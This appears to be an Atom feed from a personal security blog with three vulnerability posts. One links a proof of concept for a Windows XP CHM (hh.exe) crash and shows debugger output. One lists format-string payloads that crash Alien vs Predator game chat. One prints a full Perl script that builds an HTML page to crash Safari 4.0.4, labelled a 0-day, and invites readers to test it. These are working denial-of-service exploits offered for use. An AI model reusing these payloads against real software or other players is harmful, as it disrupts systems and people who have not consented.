<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8447104270340227710</id><updated>2012-02-16T08:37:04.590Z</updated><title type='text'>NoBytes.com</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://blog.nobytes.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>John</name><uri>http://www.blogger.com/profile/12764908503070626980</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_TUYmo186i10/S-8RS2joxCI/AAAAAAAAAAM/t3wx-2tdiq4/S220/TWITTERLOGO.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>3</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-5446550841544973109</id><published>2011-08-22T14:28:00.009+01:00</published><updated>2011-08-22T14:48:16.412+01:00</updated><title type='text'>WinXP Compiled Help File (CHM) DoS (hh.exe)</title><content type='html'>Here's a PoC Windows XP 'Compiled Help File' (CHM) DoS which has been sitting on my hard disk for a while, tested working on fully patched WinXP SP3 32bit machine:&lt;br /&gt;&lt;br /&gt;Crashing Executable: hh.exe&lt;br /&gt;Version: 5.2.3790.2453&lt;br /&gt;&lt;br /&gt;WinDbg result:&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:78%;"&gt;&lt;code&gt;(ed8.edc): Stack overflow - code c00000fd (!!! second chance !!!)&lt;br /&gt;eax=00042968 ebx=000af0b0 ecx=00042964 edx=0007ebb0 esi=000af0b0 edi=0007ebe0&lt;br /&gt;eip=65e3d633 esp=0007e95c ebp=0007ebb4 iopl=0         nv up ei pl nz na po nc&lt;br /&gt;cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202&lt;br /&gt;itss!_chkstk+0x33:&lt;br /&gt;65e3d633 8501            test    dword ptr [ecx],eax  ds:0023:00042964=00000000&lt;br /&gt;&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;!exploitable result:&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:78%;"&gt;&lt;code&gt;Exploitability Classification: UNKNOWN&lt;br /&gt;Recommended Bug Title: Stack Overflow starting at itss!_chkstk+0x0000000000000033 (Hash=0x7c592e02.0x7a176714)&lt;br /&gt;&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;Download PoC &lt;a href="http://www.nobytes.com/exploits/nobytes24.zip"&gt;Here&lt;/a&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8447104270340227710-5446550841544973109?l=blog.nobytes.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/5446550841544973109/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2011/08/winxp-compiled-help-file-chm-dos-hhexe.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5446550841544973109'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/5446550841544973109'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2011/08/winxp-compiled-help-file-chm-dos-hhexe.html' title='WinXP Compiled Help File (CHM) DoS (hh.exe)'/><author><name>John</name><uri>http://www.blogger.com/profile/12764908503070626980</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_TUYmo186i10/S-8RS2joxCI/AAAAAAAAAAM/t3wx-2tdiq4/S220/TWITTERLOGO.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-8103405057804933834</id><published>2010-02-27T00:15:00.009Z</published><updated>2010-02-27T00:31:59.084Z</updated><title type='text'>New 'Alien vs Predator' Format String Bugs</title><content type='html'>Alien vs Predator (Feb 17 patch) is vulnerable to Format String attacks.&lt;br /&gt;&lt;br /&gt;Posting the following in Chat (either in game or in the lobby) will crash your game, I am not sure if it will crash other users, I haven't got anybody to test on.&lt;br /&gt;&lt;br /&gt;%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;or&lt;br /&gt;%n%n%n%n%n%n%n%n%n%n&lt;br /&gt;&lt;br /&gt;Setting your Name to: '%n' will stop you from ever joining a game, you just get an error reporting your unable to connect.&lt;br /&gt;Setting your Name to '%i' will set your Name to random numbers which changes as you play.&lt;br /&gt;&lt;br /&gt;I tried contacting Steam/Rebellion/Sega, but so far had no response.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8447104270340227710-8103405057804933834?l=blog.nobytes.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/8103405057804933834/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2010/02/alien-vs-predator-format-strings.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/8103405057804933834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/8103405057804933834'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2010/02/alien-vs-predator-format-strings.html' title='New &apos;Alien vs Predator&apos; Format String Bugs'/><author><name>John</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_6wzGV-oa4u0/S4v0oGoRpAI/AAAAAAAAAAM/OpIl1JgwqhY/S220/TWITTERLOGO.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8447104270340227710.post-3172990224068953918</id><published>2010-01-20T18:25:00.004Z</published><updated>2010-01-20T18:46:10.892Z</updated><title type='text'>New 0Day Safari 'background' DoS</title><content type='html'>New 0Day Safari DoS I found last night. &lt;br /&gt;Can somebody test to confirm its working for them?&lt;br /&gt;Usage: &lt;i&gt;perl Safari_4.0.4_background_DoS.pl output.htm 114516&lt;/i&gt;&lt;br /&gt;Then browse to output.htm in Safari.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-size:78%;"&gt;&lt;code&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#&lt;br /&gt;# Safari 4.0.4 (531.21.10) - Stack Overflow/run&lt;br /&gt;# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]&lt;br /&gt;# Tested on WinXP (32bit) SP3&lt;br /&gt;#&lt;br /&gt;# Magic Numbers:&lt;br /&gt;#                114516 -&amp;gt; 114718 : Safari quits without error&lt;br /&gt;#                114719           : Safari quits with illegal operation:&lt;br /&gt;#                                   AppName: safari.exe&lt;br /&gt;#                                   AppVer: 5.31.21.10&lt;br /&gt;#                                   ModName: cfnetwork.dll&lt;br /&gt;#                                   ModVer: 1.450.5.0&lt;br /&gt;#                                   Offset: 000567a7&lt;br /&gt;&lt;br /&gt;$filename = $ARGV[0];&lt;br /&gt;$buffer = $ARGV[1];&lt;br /&gt;if(!defined($filename))&lt;br /&gt;{&lt;br /&gt;     print &amp;quot;Usage: $0 &amp;lt;filename.html&amp;gt; &amp;lt;buffer&amp;gt;\n\n&amp;quot;;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;$header = &amp;quot;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&amp;quot; . &amp;quot;\n&amp;quot;;&lt;br /&gt;$crash  = &amp;quot;&amp;lt;body background = \&amp;quot;&amp;quot; . &amp;quot;A&amp;quot; x $buffer . &amp;quot;\&amp;quot;&amp;gt;&amp;quot; . &amp;quot;\n&amp;quot;;&lt;br /&gt;$footer = &amp;quot;&amp;lt;/html&amp;gt;&amp;quot; . &amp;quot;\n&amp;quot;;&lt;br /&gt;&lt;br /&gt;$data = $header . $crash . $footer;&lt;br /&gt;&lt;br /&gt;     open(FILE, &amp;#39;&amp;gt;&amp;#39; . $filename);&lt;br /&gt;     print FILE $data;&lt;br /&gt;     close(FILE);&lt;br /&gt;&lt;br /&gt;exit;&lt;br /&gt;&lt;/code&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8447104270340227710-3172990224068953918?l=blog.nobytes.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.nobytes.com/feeds/3172990224068953918/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blog.nobytes.com/2010/01/new-0day-safari-dos-i-found-last-night.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/3172990224068953918'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8447104270340227710/posts/default/3172990224068953918'/><link rel='alternate' type='text/html' href='http://blog.nobytes.com/2010/01/new-0day-safari-dos-i-found-last-night.html' title='New 0Day Safari &apos;background&apos; DoS'/><author><name>John</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_6wzGV-oa4u0/S4v0oGoRpAI/AAAAAAAAAAM/OpIl1JgwqhY/S220/TWITTERLOGO.jpg'/></author><thr:total>2</thr:total></entry></feed>
